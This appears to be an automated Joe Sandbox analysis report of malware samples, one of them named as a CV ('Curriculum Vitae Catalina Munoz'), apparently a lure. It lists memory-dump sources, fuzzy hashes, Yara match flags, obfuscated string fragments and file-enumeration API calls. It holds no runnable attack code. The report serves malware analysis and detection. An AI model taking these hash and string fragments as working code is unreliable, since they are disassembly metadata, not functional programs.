                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 0-871070163
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0156728C
                                    Strings
                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01567294
                                    • RTL: Re-Waiting, xrefs: 015672C1
                                    • RTL: Resource at %p, xrefs: 015672A3
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 885266447-605551621
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: %%%u$]:%u
                                    • API String ID: 48624451-3050659472
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: __aulldvrm
                                    • String ID: +$-
                                    • API String ID: 1302938615-2137968064
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $$@
                                    • API String ID: 0-1194432280
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !\$"B$$4$($(X$)$,$,.$5*$6m$9$9$;m$=$E-$F$Gg$K$K9$L$L$M"$MV$P$Q$R$Sz$V$^$`$`_$c$f$h$o0$rj$vt$w$x$~$'$c$z
                                    • API String ID: 0-2341560773
                                    • Opcode ID: 0459221fc1e91769c2fd443da6c3dafdfc535180617c91f77b7154a4461a159b
                                    • Instruction ID: d6649f19d1682622159ecbc5a8af73a5f2913c792695f13179e3d3ef981ff59a
                                    • Opcode Fuzzy Hash: 0459221fc1e91769c2fd443da6c3dafdfc535180617c91f77b7154a4461a159b
                                    • Instruction Fuzzy Hash: 4072A0B0D09228DBEB29CF44C9997DDBBB1BB45308F1085D9C5196B280D7B96BD4CF44
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 6$O$S$\$s
                                    • API String ID: 0-3854637164
                                    • Opcode ID: 1da14ac81a15a74b3c674812995aa6e3bdc59496ed5cf29fc56ea1c0f6062503
                                    • Instruction ID: 74061cbbec53dd5230da82c2705080c6f7c0c6acffb5f912d05017458aaa4ff9
                                    • Opcode Fuzzy Hash: 1da14ac81a15a74b3c674812995aa6e3bdc59496ed5cf29fc56ea1c0f6062503
                                    • Instruction Fuzzy Hash: 254185B2900219BBEB14EBD5AD89EEBB3B8EF44314F0445D9E90896100E6B1BA548BD1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: o`Eo
                                    • API String ID: 0-1523922144
                                    • Opcode ID: 0c4dd874b3748cdf825ccafa87b67e457db0080c6766c89311685d8df6cfa294
                                    • Instruction ID: 0c7adb1f46aafbf7d1c252ef7930437bfed803a428a4fafface0f1d5767e9cfe
                                    • Opcode Fuzzy Hash: 0c4dd874b3748cdf825ccafa87b67e457db0080c6766c89311685d8df6cfa294
                                    • Instruction Fuzzy Hash: 6411F4B2D0111CAF9B00DFE9D9419EFB7F9EF48200F0441AAE915E7200E7715A148BA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <&
                                    • API String ID: 0-3760713469
                                    • Opcode ID: e610241b9a13561d8d23edc1cc0bef27bd449ea70ce02e0944cef1636c5d9ac7
                                    • Instruction ID: 680a61bfcb71184e7c941005183122e7223950f9dc8d2312bb7ab0f54e10e051
                                    • Opcode Fuzzy Hash: e610241b9a13561d8d23edc1cc0bef27bd449ea70ce02e0944cef1636c5d9ac7
                                    • Instruction Fuzzy Hash: A811D3B6D1121DAF9F00DFE9D9409EEBBF9EF48210F04416BE919E7200E7705A148BA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :y
                                    • API String ID: 0-1302922526
                                    • Opcode ID: 9ac0043135563faedb501d74aadd83b47cfffabdc3b8cdb9ca1a7b45265265b4
                                    • Instruction ID: 0a2c99ec06d7d8b42773d7b8748ad6756a70913d480cbac6482954c7f0ed3584
                                    • Opcode Fuzzy Hash: 9ac0043135563faedb501d74aadd83b47cfffabdc3b8cdb9ca1a7b45265265b4
                                    • Instruction Fuzzy Hash: 9A1112B2D0121CAF9B00DFE9DC409EEBBF8EF48210F0441ABE919E3200E7705A458BA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: -z
                                    • API String ID: 0-3508785202
                                    • Opcode ID: 3177c4ac56b80b0bc97f372d545b7be9a862f7ca35d4e5fac9895b70ddc10d1f
                                    • Instruction ID: 7fa720f112faa9a778d9372c5fa49d1b573c90e6ad5816c301fc9d67499c2d7e
                                    • Opcode Fuzzy Hash: 3177c4ac56b80b0bc97f372d545b7be9a862f7ca35d4e5fac9895b70ddc10d1f
                                    • Instruction Fuzzy Hash: 8501E9B2D11218AFDB40DFE8D9409EEBBF9AB18600F1446AAD915F3201E7705A148BA1
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1dc2213b4ca5915a17b06a44cd323d92dbebac4f849a3c1cc55f42ac45f7980a
                                    • Instruction ID: 8fa62a8bfa7586db91b901917a754e1a547d2c9cbebce3d037b8349af81ba151
                                    • Opcode Fuzzy Hash: 1dc2213b4ca5915a17b06a44cd323d92dbebac4f849a3c1cc55f42ac45f7980a
                                    • Instruction Fuzzy Hash: FB412FB1D11218AFDB14CF99DC81AEEBBBCEF48710F10415AF914E6240E7B4AA40CBE1
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6f2ba7e18a4266f001064aef61e5deb6503efa637d4ae4d4b28708f0aa72d344
                                    • Instruction ID: bab8a851d9e43d752a5c7712affa4519e071095cb9281b5ee91c3f1011d7ce6a
                                    • Opcode Fuzzy Hash: 6f2ba7e18a4266f001064aef61e5deb6503efa637d4ae4d4b28708f0aa72d344
                                    • Instruction Fuzzy Hash: 9631E2B5A00209ABDB04DF99D880EEEB7F9AF8C314F108259F919A3340D774A9118FA4
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b1cd31cec012f2a3f82fb82dc9ec57123c7f30fd2f4f7fc8eb654dd285773076
                                    • Instruction ID: 364a2a0f998d94b73112059faca286e0d86b200c76212ffc80a16612934eeb1f
                                    • Opcode Fuzzy Hash: b1cd31cec012f2a3f82fb82dc9ec57123c7f30fd2f4f7fc8eb654dd285773076
                                    • Instruction Fuzzy Hash: BA3108B5A00209ABDB14DF99D881EEFB7F9EF8C314F108659FD18A3240D774A9118FA4
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d79e9512ca02fc6fea4f90017a66403eebae15c9e315f01cda177bb0d36b4c39
                                    • Instruction ID: b8cc9b081131213fe6da87d5763f0692d68b33bb9a0c54b498596fa30c676777
                                    • Opcode Fuzzy Hash: d79e9512ca02fc6fea4f90017a66403eebae15c9e315f01cda177bb0d36b4c39
                                    • Instruction Fuzzy Hash: 0A21F7B5A04209ABEB14DF99DC85EEF77E8EF8C304F00855AFD18A7240D674B8118FA5
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e569c955d5d79abb64dc5e8bc7df6be0b6f2ded2d7af798564927158a0025944
                                    • Instruction ID: 4724043f9cec4501de494e7f6cdd78249e4f0af7d507803e1dc93316936c7653
                                    • Opcode Fuzzy Hash: e569c955d5d79abb64dc5e8bc7df6be0b6f2ded2d7af798564927158a0025944
                                    • Instruction Fuzzy Hash: D91187B2900115AFEB14CA96DC85EEBBBACEFC5320F1445A9F91897241D6B1F901C7E1
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 297fc3b44c081086d1caaa4f9b515c004202a26fbb1835fc51f1bcf537f375ee
                                    • Instruction ID: cf810632c6d9ab472d9d5c6c0176d7e1bd6dd081fbcb6156dbf48ba3f64a74ff
                                    • Opcode Fuzzy Hash: 297fc3b44c081086d1caaa4f9b515c004202a26fbb1835fc51f1bcf537f375ee
                                    • Instruction Fuzzy Hash: 4F1186B23802057BF724AA969C83FAB375CDB85B15F244099FB04AF1C1D6F4F91146B8
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c0b4b50d03e1b08fc0a92ed0745af71bc6b645a82747714c303a31fad3b30f6
                                    • Instruction ID: 486a1fab64728db76afc67e6cf1bc78815567474416e121a29ad31ad29a84443
                                    • Opcode Fuzzy Hash: 0c0b4b50d03e1b08fc0a92ed0745af71bc6b645a82747714c303a31fad3b30f6
                                    • Instruction Fuzzy Hash: 67213DB5A00209ABEB14DF99DC81FDFB7A8EF88310F008559FD18A7240E774B9118BA5
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 746f05f7788d8f69450570d78d5565f0b27b02e87db95d9be42b120d95cfdd6a
                                    • Instruction ID: 10425a23e8b53d0f10131754936ffc7fa3d5ad2e46bfbfb3c762f234d19149f2
                                    • Opcode Fuzzy Hash: 746f05f7788d8f69450570d78d5565f0b27b02e87db95d9be42b120d95cfdd6a
                                    • Instruction Fuzzy Hash: 8311ADB6D01219AF9B40DFA9D9409EFBBF9EB58210F1441ABE915E7200E6705A048BA1
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b4fc07aea92ba81217fd7c1098d3cdfbca581601c2335a24012210f2338dc1d
                                    • Instruction ID: e24219b9c9580935597874fb62fa181d34d579fc3c9bad9ffc11f995d6b6f2a3
                                    • Opcode Fuzzy Hash: 2b4fc07aea92ba81217fd7c1098d3cdfbca581601c2335a24012210f2338dc1d
                                    • Instruction Fuzzy Hash: BB1194716006047BE710EFA8DC45FAB73ACEF89614F008559FD1967280D770B9118BA5
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 29bf5a0d2a396fb666c72a3444a8688922c9b016de459162dab6ece4f2ed2d9a
                                    • Instruction ID: b2136ac25055d497c97f817ab2b4b2b2ec1b8edef059bafcbb2fd2ec0e2b330d
                                    • Opcode Fuzzy Hash: 29bf5a0d2a396fb666c72a3444a8688922c9b016de459162dab6ece4f2ed2d9a
                                    • Instruction Fuzzy Hash: 5111A7716042147BE710EFA9DC45FAB77ACDF89614F00855EFD1867280D774B5118FA1
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7979f273ad54cb4525ee8336784a11277a19df5c0f2ee1955d1719438caf4817
                                    • Instruction ID: 4c7c4764786f11216de6176efa596014f137d845c3573820728a27fc5226ddf7
                                    • Opcode Fuzzy Hash: 7979f273ad54cb4525ee8336784a11277a19df5c0f2ee1955d1719438caf4817
                                    • Instruction Fuzzy Hash: 2A01B5B6A002187BF714EAA4DC85DEF736CDF45214F0002DAFD1897241FAB0BE528AE5
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 01f50e6fe848f12abc89d7e3ba2481aae4480743074249ffca831b9ecf9d2e2b
                                    • Instruction ID: 2d34c32c9e166666e5505e419d6ea96452b540dbd696505431f01ecf51f6993d
                                    • Opcode Fuzzy Hash: 01f50e6fe848f12abc89d7e3ba2481aae4480743074249ffca831b9ecf9d2e2b
                                    • Instruction Fuzzy Hash: 3D11FAB1D21229AF8F00CFA998845EDBBF8FA49720F10855BF858E7200D7B09A518FD4
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c6e99a57c4e07f766d75fb7922e620f08570094a86bf9a7d7399b37cdde083c4
                                    • Instruction ID: 27da22095068ed38f79b0bcdf2d600455acb4c9aebe27caada93292aa8ef817c
                                    • Opcode Fuzzy Hash: c6e99a57c4e07f766d75fb7922e620f08570094a86bf9a7d7399b37cdde083c4
                                    • Instruction Fuzzy Hash: 750180B6205108BBDB44DF99DC80EEB77ADAF8C714F518259BA19A3244D630F8518BA4
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 47768fe77eaf4c2ebfa5c9f925e232530c023efc340fd02a46615d8820e3cc67
                                    • Instruction ID: 09f8c25546d22f4a4ebf11e327423efa7cbac32fc236a7893b8db5dfc5edb459
                                    • Opcode Fuzzy Hash: 47768fe77eaf4c2ebfa5c9f925e232530c023efc340fd02a46615d8820e3cc67
                                    • Instruction Fuzzy Hash: BCF0A773A002166BEB109AADBCC4B96B7DCFB89334F240672F95CD7281D671F85186E0
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1c44ca68d18b9b71c860152480c03bb9ab5fef003ed8db6a4d01bd95a86ba960
                                    • Instruction ID: 6a5ea213e4c3306f00dc7d12050ef0c8522bf9c4692b1548453f2618e040fdb7
                                    • Opcode Fuzzy Hash: 1c44ca68d18b9b71c860152480c03bb9ab5fef003ed8db6a4d01bd95a86ba960
                                    • Instruction Fuzzy Hash: 8FE0C27230812ABB9B10EE98AC009EE739CDE5657470841D1FE0CDF601E261FE3143E5
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 44ae07883cbd01b6d2a37bc254970c9f418910fc6d13896ce739d5f85aec79a1
                                    • Instruction ID: 968373cf8289398abef4a1f7dbe768bdf8b00bdc517e6e63500dfeb2dc2cde32
                                    • Opcode Fuzzy Hash: 44ae07883cbd01b6d2a37bc254970c9f418910fc6d13896ce739d5f85aec79a1
                                    • Instruction Fuzzy Hash: A0F01CB5200209BBDB10EF99DC81E9B77ACEFC8714F108419FA18A7240D670B9118BB4
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 643a7621eb10bba5e14b4fa7303a150531b40588bc20dbc2d0e94507e6f9a698
                                    • Instruction ID: 2443cd862566f8a79ed0611ef928aa34bfe9d7fceb33144300cdbc8dba088761
                                    • Opcode Fuzzy Hash: 643a7621eb10bba5e14b4fa7303a150531b40588bc20dbc2d0e94507e6f9a698
                                    • Instruction Fuzzy Hash: D3F0A7B1944218BAEB24FBF4ED89EBA73FCEB48304F0051C9BD0997141E571AE944A96
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2cbc616066dca2fff9d95f765f5f3f61b90155f19f2508db422bbec96e683eca
                                    • Instruction ID: 93936a25e133e356c7f0875cca5523f61ac6b09cb34006efcb56de86840bb309
                                    • Opcode Fuzzy Hash: 2cbc616066dca2fff9d95f765f5f3f61b90155f19f2508db422bbec96e683eca
                                    • Instruction Fuzzy Hash: 4AE06576204209BBEA14EF99EC84EAB73ACEFC8714F004459F908A7240D670B8108AB8
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e6eeadf7b1559f57e7846a93a7e434bb6d57658e972a3954147908ec06b93be9
                                    • Instruction ID: 99d95e58ab92f8f8546cefeae09bf03388b823e7aa89c8af7b8c84a49a922f3f
                                    • Opcode Fuzzy Hash: e6eeadf7b1559f57e7846a93a7e434bb6d57658e972a3954147908ec06b93be9
                                    • Instruction Fuzzy Hash: 88F08271D1520DEBDB18CFA4D841BDDBBB4EB04320F1087EEE8259B280E634A7508781
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fee4d80f25b739acdfb4f48713f4944bc21d8a68324ec215f6b898b3b9ae2327
                                    • Instruction ID: 0745407c1e09190da642b731126010fc559cd86d076386f2197ee5526d19f47e
                                    • Opcode Fuzzy Hash: fee4d80f25b739acdfb4f48713f4944bc21d8a68324ec215f6b898b3b9ae2327
                                    • Instruction Fuzzy Hash: B6E04F72B0061477D22055899C95FA7775CDBC5B62F1900A9FE089B340E5A0BA0182E4
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_4b50000_OZCzxhvCDDlUqJnCoH.jbxd
                                    • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                    • API String ID: 0-3248090998
                                    • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                    • API String ID: 0-1002149817
                                    • String ID: !=82$%4)%$%<=z$)<=j$)<=}$0!!=$0%8>$0'87$064~$43!}$4~0!$64~&$820%$8<06$8>?~$=}0!$?6}{$?~)9$Q$h}8<$}8<0$~9%<$~{j
                                    • API String ID: 0-2468648327
                                    • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                    • API String ID: 0-3236418099
                                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                    • API String ID: 0-392141074
                                    • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                    • API String ID: 0-2356907671
                                    • String ID: D$\$e$e$i$l$n$r$r$w$x
                                    • API String ID: 0-685823316
                                    • String ID: :$:$:$A$I$N$P$m$s$t
                                    • API String ID: 0-2304485323
                                    • String ID: 4$DDXQ$RUF]$X]_Q$]Z@[$bQFG$y[N]$}Z@Q
                                    • API String ID: 0-3520094000
                                    • String ID: L$S$\$a$c$e$l
                                    • API String ID: 0-3322591375
                                    • String ID: F$P$T$f$r$x
                                    • API String ID: 0-2523166886
                                    • String ID: $i$l$o$u
                                    • API String ID: 0-2051669658
                                    • String ID: $e$k$o
                                    • API String ID: 0-3624523832
                                    • String ID: $e$h$o
                                    • API String ID: 0-3662636641
                                    • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                    • API String ID: 0-2877786613
                                    • String ID: $e$h$o
                                    • API String ID: 0-3662636641
                                    • String ID: 6$P$Q$u
                                    • API String ID: 0-1633214214
                                    • String ID: $e$k$o
                                    • API String ID: 0-3624523832
                                    • String ID: #$5$D$b
                                    • API String ID: 0-2622648334
                                    • Opcode ID: 788ef259fe25a8d528f51b67e656537d836f0a612b9179abe46eeeb2d6f7e868
                                    • Instruction ID: 96e6218c3815820952ee9bdee3853aa2c084da6e74de5e7b89db3ef698835d52
                                    • Opcode Fuzzy Hash: 788ef259fe25a8d528f51b67e656537d836f0a612b9179abe46eeeb2d6f7e868
                                    • Instruction Fuzzy Hash: 7F11CC20D0C7CED9DB12CABC84086AEBF715B23224F0883C9D5F46B2D2D2754716D7A6

                                    Execution Graph

                                    Execution Coverage:2.8%
                                    Dynamic/Decrypted Code Coverage:4.3%
                                    Signature Coverage:1.6%
                                    Total number of Nodes:437
                                    Total number of Limit Nodes:71
                                    APIs
                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 02FDBF74
                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 02FDBFAF
                                    • FindClose.KERNELBASE(?), ref: 02FDBFBA
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 3541575487-0
                                    • Opcode ID: 42131818c073d7acbafc637ce1124cfd21395ed37e2af7b24c117cb915c70900
                                    • Instruction ID: 5f7c296261d9b3437dd3877972fe364598c211ec2d4d07c7968155c563e84e0f
                                    • Opcode Fuzzy Hash: 42131818c073d7acbafc637ce1124cfd21395ed37e2af7b24c117cb915c70900
